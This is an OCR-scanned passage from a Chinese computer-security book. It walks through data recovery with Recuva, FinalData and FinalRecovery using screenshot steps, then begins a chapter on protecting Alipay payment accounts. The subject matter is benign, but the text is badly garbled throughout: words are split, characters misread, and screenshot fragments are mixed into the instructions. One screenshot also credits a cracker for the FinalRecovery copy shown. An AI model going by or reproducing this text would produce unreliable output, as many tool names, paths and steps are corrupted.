全 部 播放 新建 文件 夫 


文件 (F) ”编辑 (E) 
组 织 了 包 会 到 库 中 Y 





六 收藏 夫 
思 下 载 
出 | 讲 面 
通 最 后 访问 的 位 置 


国 十 风 空灵 淡 豪 天 元 .… 
国 | 二 风 音 乐 千年 风雅 ..。 1 
国 古风 音乐 烟雨 庄 .m... 


网 证 剑 言 谭 落叶 沉香 .. 











系统 和 数据 的 备份 与 恢复 


STEP06: 扫描 到 的 音乐 文件 


< Piriform Recuva 


Recuva.com 


49,1019 
》 Microsoft Windows 7 下 月 0 tSp1 
| Pentium Dual-Core CPU E6300 @ 2.80GHz, 4.0GB RAM, Intel G41 Express Chipse 


色 选 您 想 要 恢复 的 文件 然后 点 击 恢复 按钮 ， 


为 获得 最 佳 结果 , 请 恢 香 妇 件 到 不 同 的 驱动 器 . 


v 2 i 烟雨 庄 .mp3 

全 广 剑 言 谭 落叶 沉香 变奏 .mp3 

@ 证 风 空 吴 淡 京 天 元 主题 言 乐 ,.m. 
动 十 风 音乐 千年 风雅 .mp3 























路 径 


CN\Users\Administrator\Desktop\ 新 建文 件 实 (3 
CA\Users\Administraton\Desktop\ 新 建文 件 夫 (3)\... 
C:\Users\Administrator\Desktop\ 新 建文 件 夫 (3)\... 
CNA\Users\Administrator\Desktop\ 新 建文 件 夫 (3)\.， 
CNUsersWwdministratorDesktop\ 新 建文 件 夫 (3)\. 
CUsersWdministrator\Desktop'\ 新 建文 件 夫 (3)\.， 
C:\UsersWwdministrator\Desktop'\ 新 建文 件 夫 (3)\.， 
CNAUsersWdministratomDesktop\ 新 建文 件 夫 (3)\.. 
CNUsersWwdministratomDesktop'\ 新 建文 件 夫 (3)\ 
CNUsersWwdministratorDesktopP\ 新 建文 件 夫 (3)\ 
C: El ee 3... 


Am -is- -一 人 立 FZ 二 1 由 mA 


只 本 -3 PN 





切换 到 高 级 模式 


最 后 收 改 8 人 
2011/10/ 品 
2011/8/7 
2011/9/1 
2011/8/1 
2011/8/7 
2011/8/9 
2013/7/9 
2012/9/2 
2011/8/2 
2012/3/1 
2011/10/ 


mnma II 





不 完整 的 结果 . [C:] 


S, 73.2 GB. 谈 大 小 : 4096. 文件 记录 大 小 : 1024. 在 150.09 种 闪 找 型 | 1,02..… 





在 线 帮 助 


STEP08: 完成 整 


要 恢复 的 音乐 文件 。 





单 击 “ 恢 复 ” 


按钮 。 


恢复 文件 操作 








总 计 恢 复 4 个 立 件 : 
完全 恢复 0 个 立 件 
部 分 恢复 4 个 立 件 


探 作 使 用 时 间 0.20 


单 击 “确定 ” 按 钮 。 


种 





在 设置 文件 存储 位 置 可 碍 看 到 已 经 恢复 的 音乐 文件 。 
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到 > 





攻防 从 入 门 到 精通 





在 直接 搜索 文件 失败 时 ， 可 启用 深度 搜索 功能 。 该 功能 能 够 提高 文件 的 搜 
索 和 扫描 效果 ， 但 是 也 会 消耗 更 多 的 扫描 时 间 。 





提示 


2. 通过 扫描 特定 磁盘 位 置 恢复 数据 
Recuva 数据 恢复 软件 还 可 以 直接 扫描 特定 的 磁盘 位 置 来 恢复 文件 ， 这 样 可 以 大 大 地 看 
省 扫描 时 间 ， 提 高 文件 恢复 效率 。 


STEP01: ”启动 Recuva 数据 恢复 软件 STEP02: 选择 文件 位 置 





文件 类 型 Ss 文件 位 置 
您 在 恢复 什么 类 型 的 文件 ? < 文件 在 哪里 ? 


镶 所 有 文件 (A) 各 无 法 确定 () 
显示 所 有 文件 ， 查找 本 计算 机 中 的 所 有 位 置 ， 
加 图片 (P) 本 品 在 我 的 存 请 卡 或 Pod 上 
只 显示 图 片 文件 , 剖 如 数码 照片 , 查找 所 有 可 移动 磁盘 人 除了 CD 和 软盘 ) 上 已 删除 的 文件 . 


已 音乐 (M) 同 在 我 
只 显示 音乐 文件 , 便 如 MP3 播放 器 的 音乐 文件 丰 光 党 A 





口 文档 (D) 
只 显示 公共 办 公文 档 格 式 , 例如 Word 和 Exeal 文件 人 
口 视频 V) 
只 显示 视频 文件 , 例如 数码 摄像 机 拍摄 的 片段 


局 压缩 (GO) 
只 显示 压缩 文件 . 
局 电子 邮件 (E) 


Show only emails fom Thunderbird, Outiook Express, Windows Mail and Microso 代 
Outiook， 








注 [ED 
选中 “所 有 文件 ” 单 击 “ 下 一 。 ”选中 “在 特定 位 置 ” 单 选 按钮 后 单 击 “ 浏 览 ” 按钮。 
单 选 按钮。 步 ”按钮 。 
STEP03: 选择 要 恢复 的 文件 夹 STEP04: ”查看 已 选择 的 文件 位 置 


Recuva 向 导 


文件 位 置 
文件 在 哪里 ? 


各 无 法 确定 上 
查找 本 计算 机 中 的 所 有 位 置 
个 在 我 的 存储 卡 或 Pod 上 
bh baiduyundownload 查找 所 有 可 移动 赚 盘 除了 cD 和 软盘 ) 上 已 腹 除 的 文件 . 


» FavoriteVideo 





: 器 在 回收 站 (B) 
bh Gamedownloader 查找 在 回收 站 量 除 的 文件 


4 1 kankan 本 @ 在 特定 位 置 (5) 
E:\ 新 建文 件 夹 kankan 


Ona CD /DVD 





i 











选中 要 恢复 的 文件 夹 。 国 单 击 “ 确 定 ” 按 钮 。 单 击 “下 一 步 ” 按 钮 。 


3506 


< 第 17 章 





STEP05: 准备 查找 文件 


jy 文件 列表 . 
按钮 . 


:将 会 看 到 一 个 Reauva 是 
想 要 恢 香 的 康 件 并 点 击 恢复 





EF 
3. 通过 扫描 内 容 恢复 数据 





当 只 体 的 茶 个 文件 出 现 问 题 时 ， 用 户 可 通过 扫描 和 内容 的 方式 来 恢复 文件 数据 。 
细 介 绍 使 用 Recuva 数据 恢复 软件 通过 扫描 内 容 恢复 数据 的 具体 操作 方法 和 步 


STEP01: ”启动 Recuva 数据 恢复 软件 


欢迎 来 到 Recuva 向 导 


这 个 向 导 会 帮助 您 恢复 您 晤 除 的 交 件 , 只 需 回 答 漳 单 几 
个 问题 , Recuva 会 帮 您 做 余下 的 事情 ， 


如 果 您 不 想 使 用 向 导 4 简单 的 单 击 一 下 取 ; 消 您 将 可 以 访 
问 Recuva 的 高 级 功能 


加 | 启动 时 不 显示 此 向 导 () 





在 “欢迎 
钮 。 
STEP03: 单 击 “扫描 内 容 ”" 命 令 


Li Piriform Recuva 


加 


ca 本 地 磁盘 人 E:) 


来 到 Recuva 向 导 ” 界 面 中 单 击 “取消 ” 按 


Recuva. com v1.49.,1019 
Microsoft Windows 7 请 舰 版 32-bit SP1 


Pentium Dual-C Core CPU E5300 @ 2.80GHz, 4.0GB RAM, Intel G41 





单 击 “ 扫 描 ” 按 钮 右 侧 的 下 拉 按 钮 ， 在 展开 的 列表 
中 单 击 “ 扫 描 内 容 ” 命 令 。 








系统 和 数据 的 备份 与 恢复 


单 击 “开始 ”按钮 ， 即 开始 扫描 ， 接 下 来 的 步骤 与 
前 面 “ 1. 通过 向 导 恢 复 ” 中 的 STEP05~ STEP09 
相同 。 





现在 评 
又 。 
STEP02: 打开 数据 恢复 软件 主 界面 


局 Piriform Recuva 


Recuva. com vi.43,10 
| Se Os ee 四 让 上 bi its 


2 


电子 邮件 




















选择 要 扫描 的 磁盘 以 及 文件 类 型 。 


STEPO4: 


ai Piriform Recuva 


输入 搜索 关键 字 


Reem: Com v1.49,1019 
lgelel i le [| SP1 


Pen Dual-Core ;CPL Jj E6300 人 @ 2.80G 


-| (Be le) . 


Hz, 4.0GB RAM, Inte| G41 Express Chipse 





* doc|*,.xls|*.ppt|*.odt 


本 地 了 磁盘 企 :) 


第 15 章 数据 恢复 | 





局 =.doc|*.xls|*.pptl=.odtl*.ods|*.pdf 国 ~ 


单 击 “ 扫 描 ” 按 钮 。 
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取 RN 


Im 
全- 攻防 从 入 门 到 精通 


新 售 人 他 他 


STEP05: 开始 扫描 





步 劝 2 夫 4: Analyzing damage 查看 扫描 进度 。 扫描 完成 后 ， 用 户 可 按照 前 面 
当前 进度 : 45% “1 .通过 向 导 恢 复数 据 ” 的 STEP06 ~ STEP09 
时 也 | 进行 操作 。 
预计 剩余 时 间 : 0 分 





17.3.2 ”使 用 FinaData 来 恢复 数据 


FinalData 具有 强大 的 数据 恢复 功能 ， 并 且 使 用 非常 简单 。 它 可 以 轻松 恢复 误 删 数据 、 
误 格 式 化 便 盘 文件 ， 甚 至 恢复 U 盘 、 手 机 卡 、 相 机 卡 等 移动 存储 设备 的 误 删 文件 。 

1. 使 用 FinalData 恢复 误 删 文件 

当 用 户 在 计算 机 中 误 删 了 一 个 重要 的 文件 时 ， 可 立即 停止 操作 并 通过 FinalData 来 恢 
复 该 误 删 文件 。 接 下 来 就 详细 介绍 使 用 FinalData 恢复 误 删 文件 的 具体 操作 方法 和 步骤 。 
STEP01: 运行 FinalData STEP02: 选择 要 恢复 的 文件 和 目录 所 在 的 位 置 


pe 


加 FinalData | 四 FinalData 购买 注册 
DATA RECOVERY 回 使 有 教程 【@ 用 户 评价 WIA jE00YE 加 使 用 教程 【人 用户 评价 


请 选择 您 遇 到 的 问题 (鼠标 停留 在 功能 按钮 可 查看 详情 》 请 选择 要 恢复 的 文件 和 目录 所 在 的 位 置 
”日 有 新 建文 件 夫 


| | 站 期 [批量 下 载 ] ACDSeepro8. 1. 197_Li te 等 . zip 
上 [如 | fi al layer 
A : i al Oa 
恢复 被 永久 删除 的 文件 或 者 目录 : | 由-… 大 iteVideo 
| [有 Game oader 
bys i U 瘟 手机 相机 卡 恢 复 | 和 orkshop_6.7.3. 量 也 3 
文 | 和 
. i 者 | Cw oa 
PHF+NySAQL, 
Dy Private Pix 














:人 QQ 在 线 服 电话 : 18667133607 Q9: 4006718068 区 .。 
单 击 主 界面 上 的 “ 误 删 除 文件 ”图 标 。 单 击 “ 下 一 步 ” 按 钮 。 
STEP03: 查找 已 删除 的 文件 STEP04: 查看 扫描 到 的 文件 





malData5 购买 注册 EimalData 
DATA RECOVERY 加 人 用 教程 ”加 用 户 评价 ”DATA RECOVERY 
查找 已 经 删除 的 文件 扫描 结果 : 妈 
最 后 修改 球 限 | 类 型 [ 球 限 | + 文件 名 


创建 时 间 修改 时 间 





正在 扫描 文件 ; 请 稍 候 
| 








四- 9. 口 用 SRECYCLE.BIN 
由 - 口 肌 #Lost Path# 


当前 找到 的 已 删除 文件 : 
正在 分 析 文件 系统 ; 请 稍 候 





; 
QQ 在 线 : 18667133607 QQ: 4006718068 各 Qt 线 | 
可 查看 文件 扫描 进度 。 勾 选 需要 恢复 的 文 单 击 “ 下 一 步 " 
件 夹 。 按钮 。 
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系统 和 数据 的 备份 与 恢复 


STEP05: 选择 恢复 路 径 STEP06: 设置 要 恢复 的 文件 存储 位 置 


EimmalData 购买 注册 
@) 使 用 教程 “全 用户 评价 


DATA RECOVERY 


选择 恢复 路 径 


局 库 
b 网 家 庭 组 


请 选择 一 个 目录 存放 恢复 出 来 的 文件 : 
D:\EDR 


> 肌 ssh 
| 吕 计算 机 
”人 网 络 


如 果 了 盘 有 文件 需要 恢复 ， 请 另外 选择 目录 存放 恢复 出 来 的 文件 。 
选择 恢复 文件 ; 50 个 
文件 大 小 总 计 : 1.54 GB 





we sn 
新 建文 件 来 员 ) 


单 击 “ 浏 览 ”按钮 。 选 定 存储 位 置 后 单 击 “ 确 定 ” 按 钮 。 
STEP07: 返回 “选择 恢复 路 径 ” 





EimalData 购买 注册 


DATA RECOVERY 使 用 教程 “@ 用 户 评价 


请 选择 一 个 目录 存放 恢复 出 来 的 文件 : 


对 天 查看 已 选择 的 恢复 路 径 。 


如 果 0 盘 有 文件 需要 恢复 ， 请 另外 选择 目录 存放 恢复 出 来 的 文件 。 
选择 恢复 文件 : 50 SE 
文件 大 小 总 计 : 1.54 GB 


单 击 “ 下 一 步 ”按钮 ， 即 可 对 文件 进行 恢复 。 





: 18667133607 QQ: 4006118068 
2. 使 用 FinalData 恢复 误 格 式 化 硬盘 文件 
当 用 户 不 小 心 将 硬盘 格式 化 后 忽然 发 现 人 硬盘 中 还 有 重要 数据 时 ， 不 用 惊 恢 ， 此 时 完全 
可 以 使 用 FinalData 来 恢复 误 格 式 化 便 盘 文件 。 接 下 来 详细 介绍 使 用 FinalData 恢复 误 格 式 
化 硬盘 文件 的 具体 操作 方法 和 步骤 。 
STEP01: 打开 FinalData 主 界 面 STEP02: 选择 要 恢复 的 分 区 


| 


PITalData 买 寺 FinalData 中 二 
DATA RECOVERY Pe p< Ca DATA RECOVERY @ 使 用 教程 @ 用 户 评价 


请 选择 要 恢复 的 分 区 


> tna oo 














: 18667133607 : 4A006718068 各 QQ 在 线 | 
单 击 “ 误 格式 化 硬盘 ”图 标 。 选中 要 恢复 的 分 区 。 病 单 击 “ 下 一 步 ”按钮 。 
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取 RD 


SEA i 1 -于 
全- 攻防 从 入 门 到 精通 


会 人 也 全 
STEP03: 查找 分 区 格式 化 前 的 文件 。 “〖STEP04: 扫描 到 的 可 恢复 的 文件 或 文件 来 


FinalData 9 | FimmnalData 购 寺 注册 
图 DATA RECOVERY pr re yy DATA RECOVERY ee pp 





@ 使 用 教程 ” 车 用户 评价 使 用 教程 ” 食用 户 评价 


查找 分 区 格式 化 前 的 文件 SS 0 





加 图像 
人 @ 媒体 


正在 扫描 文件 ， 请 稍 候 …*… 因 岂 








局 最 后 修改 时 间 不 限 
当前 扫 摘 到 的 文件 : | 今天 
W: ADIR2AQDY4HXF6_yD5}108_GARX46 丁 xnl 加 一周 内 
国 本 月 内 
大 ”今年 内 


输入 文件 名 搜索 4 


2 三 : 18667133607 : 4006718068 
查看 扫描 进度 条 。 义 选 需要 恢复 的 文件 单 击 “ 下 一 步 " 








夹 。 按钮 。 





STEP05: 选择 恢复 路 径 STEP06: 设置 要 恢复 的 文件 存储 位 置 


四 FinalData 
图 ”DATA RECOVERY 辣 使 用 教程 “加 用 户 评价 


选择 恢复 路 径 


| 闻 库 

) 网 | 家 庭 组 
b 用 ssn 

b> 加 计算 机 
人 网 络 


请 选择 一 个 目录 存放 恢复 出 来 的 文件 : 
DL: “IR 


如 果 了 盘 有 文件 需要 恢复 ， 请 另外 选择 目录 存放 恢复 出 来 的 文件 * 
选择 恢复 文件 : 197 
文件 大 小 总 计 : 。 3.99 





文件 夹 色 ): ssn 


ECano 


3 18667133607 99: 4006718068 一 一 站 
单 击 “浏览 ”按钮 。 选 定 文件 存储 位 置 后 单 击 “ 确 定 ”按钮 。 
STEP07: 返回 “选择 恢复 路 径 ”界面 





























ee 
四 FinalData i 
DATA RECOVERY 加 使 用 教程 “加 用 户 评价 


选择 恢复 路 径 





Fe 查看 已 选择 的 文件 恢复 路 径 。 


如 果 D 盘 有 文件 需要 恢复 ， 请 另外 选择 目录 存放 恢复 出 来 的 文件 。 
选择 恢复 文件 : 197 站 
文件 大 小 总 计 : 3.99 吧 


由 | 一 国 单 击 “ 下 一 步 ”按钮 ， 即 可 对 文件 进行 恢复 。 
: 18667133607 : 4006718068 


3. Ne FinalData 恢复 U 盘 、 手机 卡 、 相机 卡 误 删 除 的 文件 
、 手 机 卡 、 相 机 卡 是 一 种 和 普通 硬盘 的 存储 介质 完全 不 同 的 数据 存储 设备 ， 在 此 
本 数据 被 删除 后 并 不 会 被 转移 到 回收 站 中 ， 而 是 直接 被 彻底 删除 。 但 是 通过 
FinalData 却 可 以 恢复 这 些 误 删 除 的 文件 ， 接 下 来 就 详细 介绍 使 用 FinalData 恢复 U 盘 、 手 
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< 章 


系统 和 数据 的 备份 与 恢复 


机 卡 、 相 机 卡 误 删 除 文件 的 具体 操作 方法 和 步 又 。 


STEP01: 全 FinalData 


EinalData 


DATA RECOVERY 











单 击 “U 盘 手机 卡 相机 卡 恢 复 ” 图 标 。 


STEP03: 搜索 移 动 存储 设备 中 ea 


FinalData 


DATA RECOVERY 
使 用 教程 合用 户 评价 


搜索 移动 存储 设备 中 的 丢失 文件 


正在 扫 据 文件 ， 请 稍 候 








当前 找到 的 文件 : 
doc\00000147. doc 


中 断 扫描 
客服 电话 : 18667133607 QQ: 4006718068 区 woolel: 守 5 


查看 搜索 进度 。 
STEP05: 选择 文件 恢复 路 径 


EinalData 


EN = 六 pr 
Ey DATA RECOVERY (使 用 教程 【人 用 户 评价 


选择 恢复 路 径 


请 选择 一 个 目录 存放 恢复 出 来 的 文件 : 
D:\EDR 


如 果 D 盘 有 文件 需要 恢复 ,请 另外 选择 目录 存放 恢复 出 来 的 文件 。 
选择 恢复 文件 : 963! 全 
文件 大 小 总 计 ; 2.81 GB 


客服 电话 : 18667133607 QQ: 4006718068 ws 


单 击 “ 浏 览 ” 按 钮 。 





STEP02: ei lad 
| i = 





dFmalData 购买 注册 
(3 DATA RECOVERY 辣 使 用 教程 全 用户 评价 


: 18667133607 : A4006718068 各 QQ 在 线 
选中 要 恢复 的 移动 存 单 击 “ 下 一 
储 设备 。 步 ” 按 钮 。 


STEPO04: 查 丰 搜索 到 内 容 


FinalData 


DATA RECOVERY QD 使 用 教程 【人 用 户 评价 





10 章 EE 第 11 宇 
可 本 


= 二 设 j 
了 bd2 放 晶 了， Hi 
二 只 < 站 
和 | 准 、? 等 级 以 
9 3/ 后 I EE 天 
6 云 ] 国 二) 虽 ER 
:人 永 
1 EE 0 


由 - 5. 回 攻 gif 
由 -加 昌 psd 
由 - 口 电 rar 








: 18667133607 99: 4006718068 代 co 在 线 


贺 义 选 需要 恢复 的 文件 单 击 “ 下 一 步 ” 


格式 。 按钮 。 
ET 设置 要 恢复 的 文件 存储 位 置 


DD WET Utility 
居 wr 
>” 电 Xmp 
>» DW ZoomBrowser EX 
和 ZoomBrowser EX MCU 





文件 夹 字 ) : 新 建文 件 夹 (3) 


新 建文 件 灭 好 





选中 文件 存储 位 置 后 单 击 “确定 ”按钮 。 
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卫 


上 ey 1 
关 有 全- 攻防 从 入 门 到 精通 


全 人 人 他 
STEP07: 返回 “选择 恢复 路 径 ” 界 面 














EinalData 购买 注册 
a 一 
(2) 使 用 教程 SL] 


DATA RECOVERY 


查看 已 选择 的 文件 路 径 。 


如 果 了 盘 有 文件 需要 恢复 ， 请 另外 选择 目录 存放 恢复 出 来 的 文件 。 
选择 恢复 文件 : 9631 
文件 大 小 总 计 : 2.81 GB 


单 击 “ 下 一 步 ”按钮 ， 即 可 对 文件 进行 恢复 。 





: 18667133607 QQ: 4006718068 优 QQ 在 线 


17;3.3 ”使 用 FinalRecovVery 恢复 数据 


FinalRecovery 是 一 球 功 能 强大 而 且 使 用 非常 容易 的 数据 恢复 工具 , 它 可 以 帮助 用 
户 快速 地 找 回 被 误 删 除 的 文件 或 者 文件 夹 ， 文 持 硬 盘 、 软 熏 、 数 但 相机 存储 卡 、 记 忆 
棒 等 存储 介质 的 数据 恢复 ， 可 以 恢复 在 命令 行 模 式 、 资 源 管 理 器 或 其 他 应 用 程序 中 被 
删除 或 者 格式 化 的 数据 ， 即 使 已 清空 了 回收 站 ， 它 也 可 以 帮 用 户 安 全 并 完整 地 将 数据 
找 回来 。 

1. 标准 恢复 

在 “标准 恢复 ”模式 下 ，FinalRecovery 可 对 所 选 倍 盘 进 行 快 速 扫描 ， 并 恢复 该 磁 
所 下 的 大 部 分 文件 。 接 下 来 详细 介绍 使 用 FinalRecovery 进行 标准 恢复 的 具体 操作 方法 


和 步 又 。 


STEP01: ”启动 FinalRecovery STEP02: 选择 要 扫描 的 磁盘 








的 FinalRecovery 2.2 网 FinalRecovery - 标准 你 复 
;文件 选 页 帮助 
上 全 外 网 绩 | 四 抽 2 | 广 和 国良 辐 博 
让 和 儿 拉 结果 人 
例 查找 结果 过 











合议 化 : OFA 破解 : huyufeng 
WYW. cokemouse. Com 
MEETSOFT 
FINALRECOVERY.COM 





标准 恢复 帮助 与 使 用 指南 
st es FinalRecovery 的 帮助 文件 。 


Bima an ES 上 
FinalRecovery 网 站 


了 解 更 多 关于 FinalRecovery 
的 信息 ， 在 线 订 购 充 全 版 。 





时 我 的 电 芒 
-Pp C: 03.29 63) 无 名 称 
Pp 0: (126.87 68) 无 名 称 


“PE (131,84 58) 无 名 称 


修改 日 期 
访问 日 期 





Tr 硬 科 他 应 兴 断 注册 
< 通过 分 析 | s .ABR.T 报告 硒 盘 输入 许可 证 名 称 和 注册 码 以 开 
] 启 全 部 功能 。 


的 健康 状 风 。 


属 几 
4 











在 FinalRecovery 主 界面 中 单 击 “ 标 准 恢 复 ” 图 标 。 “ 单 击 要 扫描 的 磁盘 后 直接 开始 扫描 。 
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STEP03: 查看 扫描 结果 


由 Doe - 标准 恢复 


| a OL a niet 议和 回忆 日 是 














诗 
Pp C: 03.29 68) 无 名 称 


<p 0: (126.87 6B) 无 名 称 
<p EF: (131.84 GB) 无 名 称 
sm 了: (133,76 68) 无 名 称 
: (3.74 6B) 王 叶 
pH: (511.50 MB) tutubisk 


07708713 11:23 FH 
DA/06/13 02:55 PM 
07708713 12:00 MM 


用 | 





六 


254 个 条 目 < 已 删除 : 249 个 科目 > 


扫描 完成 后 即 显 示 扫 描 结 
STEP05: 选择 目录 








找 回 的 区 件 将 被 保存 在 该 目录 中 : 





D: 恢复 文件 





警告 : 如 果 您 将 文件 保存 在 被 
遇 队 数据 的 分 区 上 ， 则 有 可 能 
将 需要 恢复 的 数据 覆盖 。 


国 单 击 “浏览 ' 按钮， 选择 
恢复 文件 存储 位 置 。 


2. 高 级 恢复 


单 击 “ 确 定 ， 
按钮 。 


接 下 来 详细 介绍 使 用 FinalRecovery 进行 高 级 恢复 的 具体 操作 方法 和 步 


STEP01: 打开 FinalRecovery 主 界面 


KM FinalRecovery 2.2 


: 0FA 破解 : huyufeng 


WYW. CC ea ouse. com 


Py 
MEETSOFT 
FINALRECOVERY.COM 


标准 恢复 
i 


帮助 与 使 用 指南 
FinalRecovery 的 帮助 文件 。 


高 级 恢复 
从 被 格式 化 、 被 是 除 的 分 区 中 


恢复 文件 ; 恢复 在 标准 模式 中 
无 法 找到 的 文件 。 


了 inalRecovery 网 站 


了 解 更 多 关于 FinalRecovery 
的 信息 ， 在 线 订 购 完全 版 。 


IDE 硬 盎 健康 诊断 注册 


3.1L.A.R.T 报告 硬盘 输入 许可 证 名 称 和 注册 码 以 开 
R 况 启 全 部 功能 。 
日 


单 击 “ 高 级 恢复 ”图 标 。 











系统 和 数据 的 备份 与 恢复 


STEP04: 多 选 需要 恢复 的 文件 夹 复 选 杠 


半 FinalRecovery - 高 级 恢复 
; 文件 选项 帮助 


Sm wren Oo Hm] Om OF 
日 狂 起 证 和 大 小 创建 时 间 
|- 馈 文 件 夹 000000 mE 


[加 文 件 000001 12/20/13 01:13 更 
01710714 04:30 FH 
回回 AurORUN INF 01710714 04:30 PM 
网 国 12/20/13 01:05 PH 
门 朝 云 不 辞 暮 _slphe_www. sh. .. 09/28/13 11:03 籼 
| 23. psd 国产 09/28/13 10:57 各 
[ De jpg 09/28/13 10:31 类 
回忆 AmroRu IHF O01/10/14 04:30 PH 





回避 AvTORUN. INF 





4 加 |[ 于 


-外 文件 夹 000010 





人 @ 4935 个 FAT 条 目 Oo 个 MTFS 条 目 
我 的 电脑 


< (C:) Wolane 值 
一 0:) Joyane 
SP (E:) Holane 新 建文 件 夹 2) 
一) Noyane 文件 夹 
| 总 :于 肚 小 8192 
一 WW.) tutulisk 8192 
a@ 物理 弧 动 器 00H (485. 76 6B) 
有 CC:) (73.29 GB) 
< 扩展 分 区 (392. 47 68) 访问 日 其 
:- 团 0:) (i26.87 GD) 
国 GE:) (131.84 68) 甸 性 
| 国 C:) (133.78 68) 
©@ WE: OLN G.T5 68) 


单 击 “ 恢 复 ” 按 钮 。 
STEP06: 查看 已 恢复 的 文件 


08/14/13 05:57 FH 
08/14/13 05:57 FH 
09728713 12:00 吉 

















文件 (F) ”编辑 (E) ”查看 (V) 工具 (T) 帮助 (H) 
组 织 Y 司 打 开 ”新 建文 件 夫 





充 收藏 夫 
四 下 载 
是 | 训 面 
间 最 乒 访 问 的 位 置 

















已 选择 2 个 项 修改 日 期 : 2014/1113 10:34 


在 所 选 存储 位 置 查看 已 经 恢复 的 文件 。 








又 。 


STEP02: 选择 要 扫描 的 磁盘 


由 FinalRecovery - 高 级 恢复 
;文件 选 页 帮助 
i 人 | 网 业 | 园 二 


让 惫 扫描 结果 小 
条 查找 结果 文件 名 创建 时 间 








一 


局 0 个 FAT 条 目 





50 个 IFS 条 目 
| Sp (CC:) HoNane 
1 0:) HoNane 
“Sp (E:) WoNane 
Sp (F:) NoNane 
PG:) 王 明 丽 
< (:) totuDisk 
日 16 物理 驱动 器 00K (465.76 68) 
C:) 03.29 68) 
日 -各 扩展 分 区 692.47 6B) 
: -- 国 0:) (26.87 68) 访问 日 期 
- 国 FE:) (31.84 GB) 





- 国 8:) (33.76 68) | 
日 全 物理 驱动 器 ol (124. 99 68) | 
他 未 使 用 .oo mB) 
| 











单 击 要 扫描 的 磁盘 后 直接 开始 扫描 。 
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取 RT 


rn 





全 人 人 他 
STEP03: 查看 扫描 结果 


网 FinalRecovery - 高 级 恢复 
; 文件 选项 帮助 








有 0 人 网 上 | 国 恨 国庆 


回馈 计 
MEN 
| ro 

回 | 时 R 

同 口 朝 云 不 辞 昔 _alpha_mm. sh .. 

回 | ] 幻影 .psa 

回回 幻 时 jpg 

回 | 冷血 总 裁 的 爱人 1. jpg 


12/20/13 01:13 PM 
12/20/13 01:18 FH 
QO1/10/14 04:30 PH 
12/20/13 01:05 PM 
09/28113 11:03 向 
09/28/13 10:57 山 
09/28/13 10:31 类 
09/28/13 01:47 PH 





« 


攻防 从 入 门 到 精通 


STEP04: 选择 要 恢复 的 文件 夹 


网 FinalRecovery - 高 级 恢复 
; 文件 选 需 帮助 


| 


日 多 扫 指 结果 

加 文件 夹 000000 
且 文件 夹 000001 

人 辐 文件 夹 000002 
全 文件 夹 000003 
回 文件 夹 000004 

-人 辐 文件 夹 000005 
铝 文件 夹 000006 ] 门 云 枯草 alpha wm sh... ACDSee Pro ... 
-加 文件 夹 000007 | | ] 3. psd MISee pro ... 








且 文件 夹 000008 ] | 幻影 .jpg ATISee Pro ... 
有 局 文件 夹 000009 J] Orvrogun. ITHF 文件 夹 





他 建 时 间 

O87/14/13 05:57 FM 
12/20/13 01:13 PH 
O01/10/14 04:30 PH 
O110/14 04:30 FH 
12/20/13 01:05 PH 
09f28/13 11:03 贡 
09/28/13 10:57 灿 
09f28/13 10:31 其 
O1/10/14 04:30 PH 





-- 回 文件 夹 000010 a = 





回 4935 个 FAT 条 目 品 o 个 ITFS 条 目 @ 4935 个 FAT 条 目 总 0 个 FS 条 目 


8192 
6192 
08/14/13 05:57 PH 
08/714713 05:57 PH 
09726713 12:00 山 


8192 
8192 
08/14/13 05:57 PH 
08/14/13 05:57 PM 
09/28/13 12:00 册 


动 器 00 (485. 76 GB) 

- 国 (C:) (73.29 GB) | 

才 扩展 分 区 (392. 47 GD) 访问 日 其 

- 0:) (26.87 68) | 

- 国 c:) (31.84 cB) | 导 必 
国 C:) (33.76 68) 

日 , 物理 驱动 器 DI G.75 GB) 


扫描 完成 后 即 显示 扫描 结果 。 勾 选 需要 恢复 的 文件 夹 ， 单 击 “ 恢 复 ”按钮 。 
STEP05: 选择 目录 STEP06: 查看 已 恢复 的 文件 


滥 


om--©L CCH C6 


二 扩展 分 区 ‘(692.47 68) 
- 国 0:) (i26.87 6D) 
i - 国 CE:) (131.84 G8) 
| - 国 C:) (33.76 68) 
日 全 4E 动 器 01k (3.75 6B) 























OO #8 ， ev， 了 | ea | Ede 
文件 (月 ”编辑 (E) ”可 看 (VW) 工具 (MT) 帮助 (H) 
组 织 ” ”包含 到 库 中 ” ”新 建文 件 实 








充 收藏 夫 





2014/1/13 11:0. 





^ 名 称 
见 下 载 | [时 归 n 关 
转 讲 面 上 居 新 建文 件 夫 (2) 2014/1/13 11:0 
泣 最 后 访问 的 位 置 


辣 库 


国 视频 








国 单 击 “浏览 ” 按钮 
选 定 恢复 文件 存储 
位 置 。 


国 单 击 “ 确 定 ”按钮 。 在 所 选 存储 位 置 查看 已 经 恢复 的 文件 。 


©@ 使 用 FinalRecovery 恢复 文件 时 ， 切 勿 一 次 性 恢复 大 于 512MB 的 文件 ， 否 
则 可 能 导致 FinalRecovery 自动 退出 或 者 内 存 出 错 。 在 这 种 情况 下 ,建议 分 多 次 
一 块 60GB 的 硬盘 一 般 需 要 3~4 天 的 时 间 。 


提示 。 进行 恢复 ， 恢 复 
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宇 到 区 3 晤 四 保障 网 络 支付 工具 的 安全 


在 网 络 购物 已 经 非常 风靡 的 今天 ， 淘 宝 网 的 支付 宝 和 拍 拍 网 的 财 付 通 已 经 
成 为 用 户 经 常 使 用 的 支付 工具 。 为 了 保障 支付 工具 的 安全 ， 就 需要 采取 一 些 有 
效 的 防护 措施 ， 使 我 们 的 个 人 财产 得 到 保障 。 

O 加 强 支 付 宝 的 安全 防护 

O 加 强 财 付 通 的 安全 防护 





攻防 从 入 门 到 精通 








对 宝 的 安全 防护 


文 付 宝 作为 一 球 网 络 文 付 工 具 已 经 被 广泛 接受 ， 对 于 经 第 使 用 文 付 宝 的 用 户 来 说 ， 其 
账户 以 及 账户 内 资金 的 安全 也 成 为 用 户 比 较 担 心 的 问题 ， 本 章 束 从 这 两 点 出 发 ， 辐 用户 介 
绍 如 何 使 目 己 的 支付 宝 账 户 以 及 账户 内 资金 更 加 安全 ， 防 御 系 数 更 融 。 


18.1.1 ”加强 支付 宝 账 尸 的 安全 防护 


加 强 支付 宝 账 户 安全 主要 有 以 下 3 个 方法 : 定期 修改 登录 密码 ， 绑 定 手机 ; 设置 安全 
保护 问题 。 

1. 定期 修改 登录 密码 

使 用 支付 宝 前 首先 要 通过 登录 密码 进行 登录 ， 密 码 登 录 错 误 将 无 法 进行 后 续 操 作 ， 
